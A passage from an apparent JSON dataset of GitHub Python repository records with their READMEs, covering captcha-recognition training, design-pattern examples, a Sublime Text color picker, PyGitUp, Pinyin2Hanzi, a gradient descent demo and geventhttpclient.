**label_\\*.png** and recommend size **128x48**. you can also use default generation:\n```\npython captcha_gen_default.py\n```\n\n## 2.convert dataset to tfrecords\nthe result file will be **/data/train.tfrecord** and **/data/valid.tfrecord**\n```\npython captcha_records.py\n```\n\n## 3.training\ntrain and evaluate neural network on CPU or one single GPU\n```\npython captcha_train.py\n```\nyou can also train over multiple GPUs\n```\npython captcha_multi_gpu_train.py\n```\n\n## 4.evaluate\n```\npython captcha_eval.py\n```\n\n## 5.recognize\nread captchas from **/data/test_data/** for recogition\n```\npython captcha_recognize.py\n```\nresult like this\n```\n...\nimage WFPMX_num552.png recognize ----> 'WFPMX'\nimage QUDKM_num468.png recognize ----> 'QUDKM'\n```\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RefactoringGuru/design-patterns-python", "link": "https://github.com/RefactoringGuru/design-patterns-python", "tags": ["design-patterns", "python"], "stars": 513, "description": "Design Pattern Examples in Python", "lang": "Python", "repo_lang": "", "readme": "# Design Patterns in Python\n\nThis repository is part of the [Refactoring.Guru](https://refactoring.guru/design-patterns) project.\n\nIt contains Python examples for all classic GoF design patterns.\n\nEach pattern includes two examples:\n\n- [x] **Conceptual** examples show the internal structure of patterns, including detailed comments.\n\n- [ ] **RealWorld** examples show how patterns can be used in real-world Python applications.\n\n\n## Requirements\n\nThese examples require Python 3.7 and newer.\n\nAll examples can be launched via the command line, using the Python executable as follows:\n\n```sh\npython src/Path-to-example/main.py\n```\n\nFor the best experience, I recommend working with examples with these IDEs:\n\n- [PyCharm](https://www.jetbrains.com/pycharm/)\n- [Visual Studio Code](https://code.visualstudio.com/) with the [Python extension](https://marketplace.visualstudio.com/items?itemName=ms-python.python)\n\n## FAQ\n\n#### 1. What is the _Client Code_?\n\n_Client_ means _client of classes, defined as part of a pattern_, which is merely a caller of the given methods or a user of the given classes. In other words, it's the part of your application's code that uses the pattern's classes.\n\n#### 2. I don't understand the roles you're referring to in RealWorld examples.\n\nTake a look at the conceptual example first. There you'll find detailed descriptions of each class in a pattern, its role, and connection to other classes.\n\n\n## Contributor's Guide\n\nI appreciate any help, whether it's a simple fix of a typo or a whole new example. Just [make a fork](https://help.github.com/articles/fork-a-repo/), make your change and submit a [pull request](https://help.github.com/articles/creating-a-pull-request-from-a-fork/).\n\nHere's a style guide which might help you to keep your changes consistent with the rest of the project's code:\n\n1. All code should match the [PEP 8 coding style guide](https://www.python.org/dev/peps/pep-0008/)\n\n2. Try to hard-wrap the code at 80th's character. It helps to list the code on the website without scrollbars.\n\n3. Aim to put all code within one file. Yes, I realize that it's not how it supposed to be done in production. However, it helps people to understand examples better, since all code fits into one screen.\n\n4. 
Comments may or may not have language tags in them, such as this:\n\n ```python\n \"\"\"\n EN: All product families have the same varieties (MacOS/Windows).\n\n This is a MacOS variant of a button.\n\n RU: \u0412\u0441\u0435 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u0438\u043c\u0435\u044e\u0442 \u043e\u0434\u043d\u0438 \u0438 \u0442\u0435 \u0436\u0435 \u0432\u0430\u0440\u0438\u0430\u0446\u0438\u0438 (MacOS/Windows).\n\n \u042d\u0442\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043a\u043d\u043e\u043f\u043a\u0438 \u043f\u043e\u0434 MacOS.\n \"\"\"\n ```\n \n This notation helps to keep the code in one place while allowing the website to generate separate versions of the examples for all listed languages. Don't be scared by the non-English part of such comments; feel free to ignore it. If you want to change something in a comment like this, just do it. Even if you do it wrong, we'll tell you how to fix it during the Pull Request.\n\n\n## License\n\nThis work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.\n\n## Credits\n\nAuthors: Alexey Pyltsyn ([@lex111](https://github.com/lex111)) and Alexander Shvets ([@neochief](https://github.com/neochief))\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "weslly/ColorPicker", "link": "https://github.com/weslly/ColorPicker", "tags": [], "stars": 512, "description": "Color picker for Sublime Text", "lang": "Python", "repo_lang": "", "readme": "### Mac OSX\n![Mac OSX](http://i.minus.com/i5KI6SBAfs7Qk.png \"Mac OS X\")\n\n### Linux\n![Linux](http://i.minus.com/ihwLvn8m29GxZ.png \"Linux\")\n\n### Windows\n![Windows](http://i.minus.com/iY1DDCRG5TsyR.png \"Windows\")\n\n## Installation\nInstall this repository via [Package Control](https://sublime.wbond.net).\n\n\n## Usage\nTo insert or change a selected color, use:\n\n- Linux: `ctrl+shift+c`\n- Windows: `ctrl+shift+c`\n- OS X: `cmd+shift+c`\n\nor use the menu action\n\n- **`Tools`** -> **`ColorPicker`**\n\n\nBy default, the hex color code is inserted using uppercase letters. To use lowercase letters instead, copy the contents of **`Preferences -> Package Settings -> ColorPicker -> Settings-Default`** to the empty file created by selecting **`Preferences -> Package Settings -> ColorPicker -> Settings-User`**, then change `\"color_upper_case\"` to `false`.\n\n## Calling from Other Plugins\nTwo commands are provided to assist in calling a color picker from other plugins. Info is shared between the plugins via a settings file. It does not have to exist on disk; it can exist only in memory for the sole purpose of sharing the return value. It is advised to use a unique name for the settings file. The data is returned in the settings key `color_pick_return`. It is advised to set `color_pick_return` to `None` in your settings file before calling any of the commands, so you can tell whether the command set the variable or not.\n\n### ColorPickApiIsAvailableCommand\nThis command is used to test if ColorPicker is installed.\n\n```python\n>> settings = sublime.load_settings('my_shared.sublime-settings')\n>> settings.set('color_pick_return', None)\n>> sublime.run_command('color_pick_api_is_available', {'settings': 'my_shared.sublime-settings'})\n>> print(settings.get('color_pick_return'))\nTrue\n```\n\n### ColorPickApiGetColorCommand\nThis command is used to call a color picker and get the selected value. 
It takes a setings file and an optional `default_color`.\n\n```python\n>> settings = sublime.load_settings('my_shared.sublime-settings')\n>> settings.set('color_pick_return', None)\n>> sublime.run_command('color_pick_api_get_color', {'settings': 'my_shared.sublime-settings', 'default_color': '#ff0000'})\n>> print(settings.get('color_pick_return'))\n#23af44\n```\n\n## Acknowledgements\n\n- [Original colorpick plugin for OS X by jnordberg](https://github.com/jnordberg/sublime-colorpick/)\n- [Original colorpick plugin for Windows by animehunter](https://github.com/animehunter/SublimeColorPickerWindowsOnly)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "msiemens/PyGitUp", "link": "https://github.com/msiemens/PyGitUp", "tags": ["python", "git"], "stars": 512, "description": "A nicer `git pull`", "lang": "Python", "repo_lang": "", "readme": "PyGitUp |Version| |Build Status| |Coverage Status|\n==================================================\n\n|PyGitUp|_ is a Python port of\n`aanand/git-up `__. It not only\nfully covers the abilities of git-up and should be a drop-in replacement,\nbut also extends it slightly.\n\n.. |PyGitUp| replace:: ``PyGitUp``\n.. _PyGitUp: https://github.com/msiemens/PyGitUp\n\nWhy use ``git up``?\n-------------------\n\n git pull has two problems:\n\n * It merges upstream changes by default, when it's really more polite to `rebase\n over them `__,\n unless your collaborators enjoy a commit graph that looks like bedhead.\n\n * It only updates the branch you're currently on, which means git push will\n shout at you for being behind on branches you don't particularly care about\n right now.\n\n (https://github.com/aanand/git-up/)\n\nDemonstration\n-------------\n\n.. image:: http://i.imgur.com/EC3pvYu.gif\n\nWhy use the Python port?\n------------------------\n\nI wasn't able to use the original ``git-up``, because I didn't want to install\na whole Ruby suite just for `git-up` and even with Ruby installed, there were\nsome problems running on my Windows machine. So, my reasons for writing\nand using this port are:\n\n1. Windows support.\n2. Written in Python ;)\n\nHow do I install it?\n--------------------\n\n1. Install ``git-up`` via `pip `__: ``$ pip install git-up``\n2. ``cd`` to your project's directory.\n3. Run ``git up`` and enjoy!\n\nHomebrew users can also use ``brew``: ``brew install pygitup``\n\nHow to run it locally?\n----------------------\n\nCould also checkout the **.github/workflows/ci-workflow.yml**\n\n1. clone repo and ``cd`` to repo directory.\n2. Install ``poetry`` as guided by `poetry installation doc `__\n3. Run ``poetry install``\n4. Run program with ``poetry run git-up``\n5. Run all tests with ``poetry run pytest -v --cov=PyGitUp`` or ``poetry run pytest -v --cov=PyGitUp --cov-report html``\n6. Run one test with ``poetry run pytest -q PyGitUp/tests/test_version.py -v --cov=PyGitUp``\n\nNote for Windows users:\n~~~~~~~~~~~~~~~~~~~~~~~\n\nSee `these instructions `__\nfor installing pip, if you haven't already installed it. 
And don't forget\nto either:\n\n- make your ``Python/Scripts`` and ``Python/Lib/site-packages`` writable for\n you,\n- run ``pip`` with admin privileges\n- or use ``pip install --user git-up`` and add ``%APPDATA%/Python/Scripts``\n to ``%PATH%``.\n\nOtherwise pip will refuse to install ``git-up`` due to ``Access denied`` errors.\n\nPython version compatibility:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nPython 3.7 and upwards are supported :)\n\nOptions and Configuration\n-------------------------\n\nCommand Line Arguments\n~~~~~~~~~~~~~~~~~~~~~~\n\n- ``git up -h`` shows a help message.\n\n- ``git up --quiet`` suppresses all output except for error messages.\n\n- ``git up --no-fetch`` skips fetching the remote and rebases all local branches.\n\n- ``git up --version`` shows the current version and optionally checks for\n updates (see below).\n\nConfiguration\n~~~~~~~~~~~~~\n\nTo configure ``PyGitUp``, you can set options in your git config. Run\n``git config [--global] git-up.[name] [value]`` to set one of these\noptions:\n\n- ``git-up.fetch.prune [*true*|false]``: If set to ``true``,\n ``PyGitUp`` will append the ``--prune``\\ option to ``git fetch`` and\n thus remove any remote tracking branches which no longer exist on\n the remote (see `git fetch\n --help `__).\n\n- ``git-up.fetch.all [true|*false*]``: If set to ``false``, ``PyGitUp``\n will only fetch remotes for which there is at least one local\n tracking branch. Setting this option will make ``git up`` always fetch\n from all remotes, which is useful if e.g. you use a remote to push to\n your CI system but never check those branches out.\n\n- ``git-up.push.auto [true|*false*]``: Push the current branch after\n rebasing and fast-forwarding.\n\n- ``git-up.push.all [true|*false*]``: Push all branches when auto-pushing.\n\n- ``git-up.push.tags [true|*false*]``: Push tags when auto-pushing.\n\n- ``git-up.rebase.arguments [string]``: If set, ``PyGitUp`` will use\n this string as additional arguments when calling ``git rebase``.\n Example: ``--preserve-merges`` to recreate merge commits in the\n rebased branch.\n\n- ``git-up.rebase.auto [*true*|false]``: If set to ``false``,\n ``PyGitUp`` won't rebase your branches for you but notify you that\n they diverged. This can be useful if you have a lot of in-progress\n work that you don't want to deal with at once, but still want to\n update other branches.\n\n- ``git-up.rebase.log-hook [cmd]``: Runs ``cmd`` every time a branch\n is rebased or fast-forwarded, with the old head as ``$1`` and the new\n head as ``$2``. This can be used to view logs or diffs of incoming\n changes. Example:\n ``echo \"changes on $1:\"; git log --oneline --decorate $1..$2``.\n\n- ``git-up.rebase.show-hashes [true|*false*]``: If set to ``true``,\n ``PyGitUp`` will show the hashes of the current commit (or the point\n where the rebase starts) and the target commit like ``git pull`` does.\n\nNew in v1.0.0:\n~~~~~~~~~~~~~~\n\n- ``git-up.updates.check [*true*|false]``: When running ``git up --version``,\n it shows the version number and checks for updates. If you feel\n uncomfortable with it, just set it to ``false`` to turn off the checks.\n\nCredits\n-------\n\nThe original ``git-up`` has been written by aanand:\n`aanand/git-up/ `__.\n\n\nChangelog\n---------\n\nv2.2.0 (*2022-11-21*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Add support for Python 3.11. Thanks\n `@hugovk `_ for `Pull Request #118\n `_.\n\nv2.1.0 (*2021-10-02*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Switch to Python's ``argparse`` for CLI argument parsing. 
Thanks\n `@ekohl `_ for `Pull Request #96\n `_.\n\nv2.0.3 (*2021-09-23*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Drop support for Python 3.6 (following GitPython)\n- Update PyGitUp's CLI argument parser `Click `_\n to version 8.0. Thanks `@hugovk `_\n for `Pull Request #109 `_.\n- Update other dependencies\n\nv2.0.2 (*2020-12-30*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Remove old Python 2 code. Thanks `@hugovk `_\n for `Pull Request #104 `_.\n\nv2.0.1 (*2020-08-26*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Update dependencies\n\nv2.0.0 (*2020-08-15*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Drop Python 2 support in order to fix `Issue 102 `_\n- Drop Ruby Bundler integration\n- Migrate tests to ``py.test``\n\nv1.6.1 (*2018-12-12*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Upgrade to click>=7.0.0. Thanks `@no-preserve-root `_\n for `Pull Request #87 `_.\n\nv1.6.0 (*2018-10-26*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Skip stashing changes when possible. Thanks `@Chronial `_\n for `Pull Request #86 `_.\n- Added faster fast-forward on branches that are not checked out. Thanks `@Chronial `_\n for `Pull Request #83 `_.\n\nv1.5.2 (*2018-09-28*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed version requirement for Click dependency (`#82 `__).\n\nv1.5.1 (*2018-09-13*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed crash on Cygwin with rebase log hook enabled (`#80 `__).\n\nv1.5.0 (*2018-04-26*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Added auto-push support. Thanks `@WoLpH `_\n for `Pull Request #74 `_.\n\nv1.4.7 (*2018-04-07*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Added shorthand commandline arguments (``-V, -q, -h``, see `#73 `__).\n\nv1.4.6 (*2017-12-19*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- 3rd party dependencies have been updated (see `#65 `__).\n\nv1.4.5 (*2017-01-02*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed problems when working with branches containing hash signs in their name\n (`#55 `__).\n- No longer installs a now unneeded script on ``pip install``. Thanks `@ekohl `_\n for `Pull Request #60 `_.\n\nv1.4.4 (*2016-11-30*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a bug when working with ``git worktree`` (`#58 `__).\n\nv1.4.3 (*2016-11-22*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a bug with GitPython <= 2.0.8 (`#56 `__, `#57 `__).\n\nv1.4.2 (*2016-09-29*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Switched the command line argument parsing library (`#53 `__).\n\nv1.4.1 (*2016-08-02*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Include tests in PyPI distribution (`#51 `__).\n\nv1.4.0 (*2016-02-29*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- 3rd party dependencies have been updated.\n- Dependencies on 3rd party libraries have been loosened to better interact with other installed packages.\n Thanks `MaximilianR `_ for `Pull Request #45 `_.\n- Added an command line argument to turn of fetching (``--no-fetch``). Thanks `@buoto `_\n for `Pull Request #46 `_.\n- Don't show a stacktrace anymore when stashing fails (`#35 `_).\n- Fixed a bug that caused problems with submodules if the submodule had unstashed changes/ Thanks\n `@Javex `_ for `Pull Request #27 `_.\n\nv1.3.1 (*2015-08-31*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a bug when showing the version on Python 3 `#34 `__.\n\nv1.3.0 (*2015-04-08*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Support for Python 3 has been added. 
Thanks `@r4ts0n `_\n for `Pull Request #23 `_\n and `@Byron `_ for quickly merging a Pull Request\n in `GitPython `_\n and releasing a new version on which this release depends.\n\nv1.2.2 (*2015-02-23*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Now updates submodules when called from ``git submodule foreach`` (`#8 `__).\n\nv1.2.1 (*2014-12-16*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a problem with ``setuptools 8.x`` (`#19 `__).\n- 3rd party dependencies have been updated\n\nv1.2.0 (*2014-12-10*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Added an option to show hashes when fast-forwarding/rebasing like ``git pull``\n does (``git-up.rebase.show-hashes``).\n- Fixed a bug when having branches with both local tracking branches and\n remote tracking branches (`#17 `__).\n\nv1.1.5 (*2014-11-19*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- 3rd party dependencies have been updated to fix a problem with a 3rd party\n library (`#18 `__).\n\nv1.1.4 (*2014-04-18*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed some typos in README and ``PyGitUp`` output.\n- 3rd party dependencies have been updated.\n\nv1.1.3 (*2014-03-23*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- ``ahead of upstream`` messages are now cyan (see `aanand/git-up#60 `__).\n- Fixed problem when using % in the log hook (`#11 `__).\n\nv1.1.2 (*2013-10-08*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed problems with the dependency declaration.\n\nv1.1.1 (*2013-10-07*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fix for `#7 `__\n (AttributeError: 'GitUp' object has no attribute 'git') introduced by\n v1.1.0.\n\nv1.1.0 (*2013-10-07*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Prior to v1.1.0, ``PyGitUp`` tried to guess the upstream branch for a local\n branch by looking for a branch on any remote with the same name. With v1.1.0,\n ``PyGitUp`` stops guessing and uses the upstream branch config instead.\n\n This by the way fixes issue `#6 `__\n (``git up`` doesn't work with local only branches).\n\n **Note:**\n This change may break setups, where a local branch accidentally has\n the same name as a remote branch without any tracking information set. Prior\n to v1.1.0, ``git up`` would still fetch and rebase from the remote branch.\n If you run into troubles with such a setup, setting tracking information\n using ``git branch -u / `` should help.\n\n- 3rd party dependencies have been updated.\n\n- Allows to run ``git up --version`` from non-git dirs, too.\n\nv1.0.0 (*2013-09-05*)\n~~~~~~~~~~~~~~~~~~~~~\n\nFinally ``PyGitUp`` reaches 1.0.0. 
You can consider it stable now :)\n\n- Added a comprehensive test suite, now with a coverage of about 90%.\n- Lots of code cleanup.\n- Added option ``-h`` to display a help screen (``--help`` **won't** work, because\n ``git`` catches this option and handles it before ``PyGitUp`` can do).\n- Added option ``--version`` to show, what version of ``PyGitUp`` is running.\n Also checks for updates (can be disabled, see configuration).\n- Added option ``--quiet`` to be quiet and only display error messages.\n\nv0.2.3 (*2013-06-05*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed issue `#4 `__ (ugly\n exception if remote branch has been deleted).\n\nv0.2.2 (*2013-05-04*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed issue `#3 `__ (didn't\n return to previous branch).\n\n\nv0.2.1 (*2013-03-18*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed problem: check-bundler.rb has not been installed when installing via\n PyPI (problems with setup.py).\n\nv0.2 (*2013-03-18*)\n~~~~~~~~~~~~~~~~~~~\n\n- Incorporated `aanand/git-up#41 `__: Support for ``bundle install --local`` and\n ``rbenv rehash``.\n- Fixed issue `#1 `__ (strange\n output buffering when having multiple remotes to fetch from).\n- Some under-the-hood improvements.\n\nv0.1 (*2013-03-14*)\n~~~~~~~~~~~~~~~~~~~\n\n- Initial Release\n\n.. |Build Status| image:: https://img.shields.io/azure-devops/build/msiemens/3e5baa75-12ec-43ac-9728-89823ee8c7e2/1.svg?style=flat-square\n :target: https://dev.azure.com/msiemens/github/_build?definitionId=1\n\n.. |Coverage Status| image:: http://img.shields.io/coveralls/msiemens/PyGitUp/master.svg?style=flat-square\n :target: https://coveralls.io/r/msiemens/PyGitUp\n\n.. |Version| image:: http://img.shields.io/pypi/v/git-up.svg?style=flat-square\n :target: https://pypi.python.org/pypi/git-up\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "letiantian/Pinyin2Hanzi", "link": "https://github.com/letiantian/Pinyin2Hanzi", "tags": [], "stars": 512, "description": "\u62fc\u97f3\u8f6c\u6c49\u5b57\uff0c \u62fc\u97f3\u8f93\u5165\u6cd5\u5f15\u64ce\uff0c pin yin -> \u62fc\u97f3", "lang": "Python", "repo_lang": "", "readme": "# Pinyin2Hanzi\n\n\u62fc\u97f3\u8f6c\u6c49\u5b57\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u62fc\u97f3\u8f93\u5165\u6cd5\u7684\u8f6c\u6362\u5f15\u64ce\uff0c\u517c\u5bb9Python 2\u3001Python 3\u3002\n\n## \u5b89\u88c5\nPython 2\uff1a\n```\n$ python setup.py install --user\n```\n\nPython 3\uff1a\n```\n$ python3 setup.py install --user\n```\n\n## \u4f7f\u7528\n\u4e0b\u9762\u7684\u793a\u4f8b\u5728Python 3\u4e2d\u8fd0\u884c\u3002\n\n#### \u57fa\u4e8eHMM\u7684\u8f6c\u6362\n\u539f\u7406\u662fviterbi\u7b97\u6cd5\u3002\n\n```python\nfrom Pinyin2Hanzi import DefaultHmmParams\nfrom Pinyin2Hanzi import viterbi\n\nhmmparams = DefaultHmmParams()\n\n## 2\u4e2a\u5019\u9009\nresult = viterbi(hmm_params=hmmparams, observations=('ni', 'zhi', 'bu', 'zhi', 'dao'), path_num = 2)\nfor item in result:\n print(item.score, item.path)\n'''\u8f93\u51fa\n1.3155294593897203e-08 ['\u4f60', '\u77e5', '\u4e0d', '\u77e5', '\u9053']\n3.6677865125992192e-09 ['\u4f60', '\u53ea', '\u4e0d', '\u77e5', '\u9053']\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = viterbi(hmm_params=hmmparams, observations=('ni', 'zhi', 'bu', 'zhi', 'dao'), path_num = 2, log = True)\nfor item in result:\n print(item.score, item.path)\n'''\u8f93\u51fa\n-18.14644152864202 ['\u4f60', '\u77e5', '\u4e0d', '\u77e5', '\u9053']\n-19.423677486918002 ['\u4f60', '\u53ea', '\u4e0d', '\u77e5', '\u9053']\n'''\n\n## 
2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = viterbi(hmm_params=hmmparams, observations=('ni', 'zhii', 'bu', 'zhi', 'dao'), path_num = 2, log = True)\nfor item in result:\n print(item.score, item.path)\n# \u53d1\u751fKeyError\uff0c`zhii`\u4e0d\u89c4\u8303\n```\n\n#### \u57fa\u4e8eDAG\u7684\u8f6c\u6362\n\u539f\u7406\u662f\u8bcd\u5e93+\u52a8\u6001\u89c4\u5212\u3002\n\n```python\nfrom Pinyin2Hanzi import DefaultDagParams\nfrom Pinyin2Hanzi import dag\n\ndagparams = DefaultDagParams()\n\n## 2\u4e2a\u5019\u9009\nresult = dag(dagparams, ('ni', 'bu', 'zhi', 'dao', 'de', 'shi'), path_num=2)\nfor item in result:\n print(item.score, item.path)\n''' \u8f93\u51fa\n0.08117536840088911 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u662f']\n0.04149191639287887 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u8bd7']\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = dag(dagparams, ('ni', 'bu', 'zhi', 'dao', 'de', 'shi'), path_num=2, log=True)\nfor item in result:\n print(item.score, item.path)\n''' \u8f93\u51fa\n-2.5111434226494866 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u662f']\n-3.1822566564324477 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u8bd7']\n'''\n\n## 1\u4e2a\u5019\u9009\nprint( dag(dagparams, ['ti', 'chu', 'le', 'bu', 'cuo', 'de', 'jie', 'jve', 'fang', 'an'], path_num=1) )\n'''\u8f93\u51fa\n[< score=0.0017174549839096384, path=['\u63d0\u51fa\u4e86', '\u4e0d\u9519', '\u7684', '\u89e3\u51b3\u65b9\u6848'] >]\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = dag(dagparams, ('ni', 'bu', 'zhi', 'dao', 'de', 'shii'), path_num=2, log=True)\nprint(result)\n# \u8f93\u51fa\u7a7a\u5217\u8868\uff0c\u56e0\u4e3a`shii`\u4e0d\u5b58\u5728\n```\n\n#### \u81ea\u5b9a\u4e49params\n\u5b9e\u73b0AbstractHmmParams, AbstractDagParams\u8fd9\u4e24\u4e2a\u63a5\u53e3\u5373\u53ef\u3002\u5177\u4f53\u53ef\u4ee5\u53c2\u8003\u6e90\u7801\u3002\n\n#### \u5173\u4e8e\u62fc\u97f3\n\u7ed9\u51fa\u7684\u62fc\u97f3\u5fc5\u987b\u662f\u201c\u89c4\u8303\u201d\u7684\u3002\u4f8b\u5982\n\n* \u7565 -> lve\n* \u636e -> ju\n\n\u5217\u4e3e\u6240\u6709\u201c\u89c4\u8303\u201d\u7684\u62fc\u97f3\uff1a\n```python\nfrom Pinyin2Hanzi import all_pinyin\nfor py in all_pinyin():\n print(py)\n```\n\n\u5c06\u62fc\u97f3\u8f6c\u6362\u4e3a\u201c\u89c4\u8303\u201d\u7684\u62fc\u97f3\uff1a\n```python\nfrom Pinyin2Hanzi import simplify_pinyin\n\nprint(simplify_pinyin('lue'))\n# \u8f93\u51fa\uff1a'lve'\n\nprint(simplify_pinyin('l\u00fc\u00e8'))\n# \u8f93\u51fa\uff1a'lve'\n```\n\n\u5224\u65ad\u662f\u5426\u662f\u201c\u89c4\u8303\u201d\u7684\u62fc\u97f3\uff1a\n```python\nfrom Pinyin2Hanzi import is_pinyin\n\nprint(is_pinyin('lue'))\n# \u8f93\u51fa\uff1aFalse\n\nprint(is_pinyin('l\u00fc\u00e8'))\n# \u8f93\u51fa\uff1aFalse\n\nprint(is_pinyin('lvee'))\n# \u8f93\u51fa\uff1aFalse\n\nprint(is_pinyin('lve'))\n# \u8f93\u51fa\uff1aTrue\n```\n\n## \u8bad\u7ec3\n\u539f\u59cb\u6570\u636e\u548c\u8bad\u7ec3\u4ee3\u7801\u5728`train`\u76ee\u5f55\u4e0b\u3002\u6570\u636e\u6765\u81ea[jpinyin](https://github.com/stuxuhai/jpinyin)\u3001[pinyin](https://github.com/overtrue/pinyin)\u3001[\u641c\u72d7\u8bed\u6599\u5e93-\u4e92\u8054\u7f51\u8bcd\u5e93](http://www.sogou.com/labs/dl/w.html)\u7b49\u3002\u5904\u7406\u6570\u636e\u65f6\u7528\u5230\u4e86\u6c49\u5b57\u8f6c\u62fc\u97f3\n\u5de5\u5177[ChineseTone](https://github.com/letiantian/ChineseTone)\u3002\n\n## \u539f\u7406\n[\u5982\u4f55\u5b9e\u73b0\u62fc\u97f3\u4e0e\u6c49\u5b57\u7684\u4e92\u76f8\u8f6c\u6362](https://www.letianbiji.com/machine-learning/2016-02-08-pinyin-hanzi.html)\n\n## 
License\nMIT\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mattnedrich/GradientDescentExample", "link": "https://github.com/mattnedrich/GradientDescentExample", "tags": [], "stars": 512, "description": "Example demonstrating how gradient descent may be used to solve a linear regression problem", "lang": "Python", "repo_lang": "", "readme": "## Gradient Descent Example for Linear Regression\nThis example project demonstrates how the [gradient descent](http://en.wikipedia.org/wiki/Gradient_descent) algorithm may be used to solve a [linear regression](http://en.wikipedia.org/wiki/Linear_regression) problem. A more detailed description of this example can be found [here](https://spin.atomicobject.com/2014/06/24/gradient-descent-linear-regression/).\n\n### Code Requirements\nThe example code is in Python ([version 2.6](https://www.python.org/doc/versions/) or higher will work). The only other requirement is [NumPy](http://www.numpy.org/).\n\n### Description\nThis code demonstrates how a gradient descent search may be used to solve the linear regression problem of fitting a line to a set of points. In this problem, we wish to model a set of points using a line. The line model is defined by two parameters: the line's slope `m` and its y-intercept `b`. Gradient descent attempts to find the best values for these parameters, subject to an error function.\n\nThe code contains a main function called `run`. This function defines a set of parameters used in the gradient descent algorithm, including an initial guess of the line slope and y-intercept, the learning rate to use, and the number of iterations to run gradient descent for. \n\n```python\ninitial_b = 0 # initial y-intercept guess\ninitial_m = 0 # initial slope guess\nnum_iterations = 1000\n``` \n\nUsing these parameters, a gradient descent search is executed on a sample data set of 100 points. Here is a visualization of the search running for 200 iterations using an initial guess of `m = 0`, `b = 0`, and a learning rate of `0.000005`.\n\n\n\n### Execution\nTo run the example, simply run the `gradient_descent_example.py` file using Python:\n\n```\npython gradient_descent_example.py\n```\n\nThe output will look like this:\n\n```\nStarting gradient descent at b = 0, m = 0, error = 5565.10783448\nRunning...\nAfter 1000 iterations b = 0.0889365199374, m = 1.47774408519, error = 112.614810116\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "geventhttpclient/geventhttpclient", "link": "https://github.com/geventhttpclient/geventhttpclient", "tags": [], "stars": 511, "description": "A high performance, concurrent http client library for python with gevent", "lang": "Python", "repo_lang": "", "readme": "# geventhttpclient\n\n[![Build Status](https://travis-ci.org/gwik/geventhttpclient.svg?branch=master)](https://travis-ci.org/gwik/geventhttpclient)\n\nA high performance, concurrent HTTP client library for python using \n[gevent](http://gevent.org).\n\n`gevent.httplib` support was removed in [gevent 1.0](https://github.com/surfly/gevent/commit/b45b83b1bc4de14e3c4859362825044b8e3df7d6\n); **geventhttpclient** now provides that missing functionality.\n\n**geventhttpclient** uses a fast [http parser](https://github.com/nodejs/llhttp),\nwritten in C.\n\n**geventhttpclient** has been specifically designed for high concurrency,\nstreaming, and supports HTTP 1.1 persistent connections. 
